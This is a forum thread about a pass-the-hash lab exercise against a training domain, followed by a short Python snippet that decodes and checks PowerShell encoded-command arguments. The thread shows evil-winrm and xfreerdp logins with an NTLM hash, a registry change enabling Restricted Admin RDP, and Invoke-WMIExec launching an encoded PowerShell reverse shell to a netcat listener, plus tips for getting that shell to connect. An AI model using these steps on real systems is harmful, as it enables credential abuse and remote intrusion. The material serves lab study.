Unable to get revershell of Pass the Hash exercise "Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, ca"

Using Julio’s hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.

I am having difficulties with this flag. I log into the julio account and get a PowerShell session using this command:

evil-winrm -i 10.129.132.69 -u julio -H <julio_NTLM_hash>

After this I run this command to allow RDP:

  1. reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Now I RDP into the julio account using this command:
xfreerdp /v:10.129.132.69 /u:julio /pth:<julio_NTLM_Hash>

Now I get a cmd prompt and run nc to start listening on port 9001 (on 172.16.1.5).

Now I generate a payload from the revshells website and run these commands in the PowerShell session obtained via evil-winrm as mentioned above.

Here are the commands that I execute in the julio PowerShell session:

Import-Module .\Invoke-WMIExec.ps1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash <julio_NTLM_Hash> -Command "powershell -e <base64_payload>"
[+] Command executed with process ID 4976 on DC01

But I did not get the reverse shell in the julio cmd. The julio cmd shows its IP as 172.16.1.5 and DC01 shows IP 172.16.1.10.

For generating the reverse shell payload I use this IP and port (172.16.1.5 and 9001).

Please help me solve this challenge and explain what mistake I have made, or any concept that is still not clear to me.


If you still need a bit of help then check out the comment section in this post. It should help you out quite a bit. Hope this helps you out as much as it did me.


Facing the same issue, were you able to solve it?

I have solved it. For any future readers, here's a heads up:

  1. Make sure you are using PowerShell #3 (base64) [it is below PowerShell #4 (TLS)], and not PowerShell #3 with the base64 encoding option selected to generate the code.
  2. While generating the base64 code, make sure encoding is set to none (if you choose it, it will basically encode the command twice, which won't work).
  3. Use the correct IP for the listener; use ipconfig to check the IP (don't confuse it with the target machine IP).
  4. The port I used was 443, not sure if it works with any other port (maybe you can try).
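As an added analyst-side check (not code from this thread or from revshells): decode a `powershell -e` argument the way PowerShell does (base64 of UTF-16LE bytes) and flag the double-encoding mistake from tip 2, where the already-encoded command line is base64-encoded a second time as plain ASCII. The sample command is constructed and benign.

```python
import base64
import binascii
import string

PRINTABLE = set(string.printable.encode("ascii"))


def encode_for_powershell(command: str) -> str:
    """Produce what `powershell -e` expects: base64 of the UTF-16LE bytes of the command."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(encoded: str) -> str:
    """Reverse of encode_for_powershell; raises if the argument is not valid base64/UTF-16LE."""
    return base64.b64decode(encoded, validate=True).decode("utf-16-le")


def classify_encoded_command(encoded: str) -> str:
    """Classify a `-e` argument.

    "ok": decoded bytes look like UTF-16LE text (every second byte is 0x00, as for an ASCII command).
    "double-encoded": decoded bytes are plain ASCII text, i.e. the command line or its base64 string
        was base64-encoded a second time, so PowerShell will decode it as UTF-16LE garbage.
    "undecodable": not valid base64, empty, or neither shape above.
    """
    try:
        raw = base64.b64decode(encoded, validate=True)
    except (binascii.Error, ValueError):
        return "undecodable"
    if not raw:
        return "undecodable"
    if len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]) and all(b in PRINTABLE for b in raw[0::2]):
        return "ok"
    if all(b in PRINTABLE for b in raw):
        return "double-encoded"
    return "undecodable"


# Constructed, benign sample: the correct encoding next to the double-encoded mistake.
SAMPLE_COMMAND = "Write-Output 'hello from MS01'"
CORRECT = encode_for_powershell(SAMPLE_COMMAND)
# What the site's "Encoding: Base64" option produces on top of the already-encoded command line.
DOUBLE = base64.b64encode(f"powershell -e {CORRECT}".encode("ascii")).decode("ascii")

if __name__ == "__main__":
    print(classify_encoded_command(CORRECT), "->", decode_encoded_command(CORRECT))
    print(classify_encoded_command(DOUBLE))
```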